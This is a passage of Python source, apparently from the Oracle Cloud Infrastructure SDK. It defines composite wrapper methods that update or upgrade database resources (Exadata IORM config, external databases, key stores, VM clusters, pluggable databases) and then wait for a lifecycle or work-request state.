Calls :py:func:`~oci.database.DatabaseClient.update_exadata_iorm_config` and waits for the :py:class:`~oci.database.models.ExadataIormConfig` acted upon
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ExadataIormConfigUpdateDetails exadata_iorm_config_update_details: (required)
Request to perform database update.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataIormConfig.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_exadata_iorm_config`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_exadata_iorm_config(db_system_id, exadata_iorm_config_update_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_iorm_config(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_container_database_and_wait_for_work_request(self, external_container_database_id, update_external_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalContainerDatabaseDetails update_external_container_database_details: (required)
Request to update the properties of an
:func:`create_external_container_database_details` resource.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_container_database(external_container_database_id, update_external_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_container_database_and_wait_for_state(self, external_container_database_id, update_external_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_container_database` and waits for the :py:class:`~oci.database.models.ExternalContainerDatabase` acted upon
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalContainerDatabaseDetails update_external_container_database_details: (required)
Request to update the properties of an
:func:`create_external_container_database_details` resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_container_database(external_container_database_id, update_external_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_database_connector_and_wait_for_work_request(self, external_database_connector_id, update_external_database_connector_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_database_connector` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalDatabaseConnectorDetails update_external_database_connector_details: (required)
Request to update the properties of an external database connector.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_database_connector(external_database_connector_id, update_external_database_connector_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_database_connector_and_wait_for_state(self, external_database_connector_id, update_external_database_connector_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_database_connector` and waits for the :py:class:`~oci.database.models.ExternalDatabaseConnector` acted upon
to enter the given state(s).
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalDatabaseConnectorDetails update_external_database_connector_details: (required)
Request to update the properties of an external database connector.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalDatabaseConnector.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_database_connector(external_database_connector_id, update_external_database_connector_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_database_connector(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_non_container_database_and_wait_for_work_request(self, external_non_container_database_id, update_external_non_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_non_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalNonContainerDatabaseDetails update_external_non_container_database_details: (required)
Request to update the properties of an external non-container database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_non_container_database(external_non_container_database_id, update_external_non_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_non_container_database_and_wait_for_state(self, external_non_container_database_id, update_external_non_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_non_container_database` and waits for the :py:class:`~oci.database.models.ExternalNonContainerDatabase` acted upon
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalNonContainerDatabaseDetails update_external_non_container_database_details: (required)
Request to update the properties of an external non-container database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalNonContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_non_container_database(external_non_container_database_id, update_external_non_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_non_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_pluggable_database_and_wait_for_work_request(self, external_pluggable_database_id, update_external_pluggable_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalPluggableDatabaseDetails update_external_pluggable_database_details: (required)
Request to update the properties of an external pluggable database resource.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_pluggable_database(external_pluggable_database_id, update_external_pluggable_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_external_pluggable_database_and_wait_for_state(self, external_pluggable_database_id, update_external_pluggable_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_external_pluggable_database` and waits for the :py:class:`~oci.database.models.ExternalPluggableDatabase` acted upon
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateExternalPluggableDatabaseDetails update_external_pluggable_database_details: (required)
Request to update the properties of an external pluggable database resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalPluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_external_pluggable_database(external_pluggable_database_id, update_external_pluggable_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_key_store_and_wait_for_state(self, key_store_id, update_key_store_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_key_store` and waits for the :py:class:`~oci.database.models.KeyStore` acted upon
to enter the given state(s).
:param str key_store_id: (required)
The `OCID`__ of the key store.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateKeyStoreDetails update_key_store_details: (required)
Request to update the attributes of a key store.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.KeyStore.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_key_store`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_key_store(key_store_id, update_key_store_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_key_store(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_maintenance_run_and_wait_for_state(self, maintenance_run_id, update_maintenance_run_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_maintenance_run` and waits for the :py:class:`~oci.database.models.MaintenanceRun` acted upon
to enter the given state(s).
:param str maintenance_run_id: (required)
The maintenance run OCID.
:param oci.database.models.UpdateMaintenanceRunDetails update_maintenance_run_details: (required)
Request to update the properties of a maintenance run.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.MaintenanceRun.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_maintenance_run`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_maintenance_run(maintenance_run_id, update_maintenance_run_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_maintenance_run(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_pluggable_database_and_wait_for_work_request(self, pluggable_database_id, update_pluggable_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdatePluggableDatabaseDetails update_pluggable_database_details: (required)
Request to perform pluggable database update.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_pluggable_database(pluggable_database_id, update_pluggable_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_pluggable_database_and_wait_for_state(self, pluggable_database_id, update_pluggable_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdatePluggableDatabaseDetails update_pluggable_database_details: (required)
Request to perform pluggable database update.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_pluggable_database(pluggable_database_id, update_pluggable_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_vm_cluster_and_wait_for_work_request(self, vm_cluster_id, update_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateVmClusterDetails update_vm_cluster_details: (required)
Request to update the attributes of a VM cluster.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_vm_cluster(vm_cluster_id, update_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_vm_cluster_and_wait_for_state(self, vm_cluster_id, update_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_vm_cluster` and waits for the :py:class:`~oci.database.models.VmCluster` acted upon
to enter the given state(s).
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateVmClusterDetails update_vm_cluster_details: (required)
Request to update the attributes of a VM cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_vm_cluster(vm_cluster_id, update_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_vm_cluster_network_and_wait_for_work_request(self, exadata_infrastructure_id, vm_cluster_network_id, update_vm_cluster_network_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_vm_cluster_network` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str vm_cluster_network_id: (required)
The VM cluster network `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateVmClusterNetworkDetails update_vm_cluster_network_details: (required)
Request to update the properties of a VM cluster network.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, update_vm_cluster_network_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_vm_cluster_network_and_wait_for_state(self, exadata_infrastructure_id, vm_cluster_network_id, update_vm_cluster_network_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_vm_cluster_network` and waits for the :py:class:`~oci.database.models.VmClusterNetwork` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str vm_cluster_network_id: (required)
The VM cluster network `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateVmClusterNetworkDetails update_vm_cluster_network_details: (required)
Request to update the properties of a VM cluster network.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmClusterNetwork.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, update_vm_cluster_network_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster_network(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def upgrade_database_and_wait_for_work_request(self, database_id, upgrade_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.upgrade_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpgradeDatabaseDetails upgrade_database_details: (required)
Request to perform a database upgrade.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.upgrade_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.upgrade_database(database_id, upgrade_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
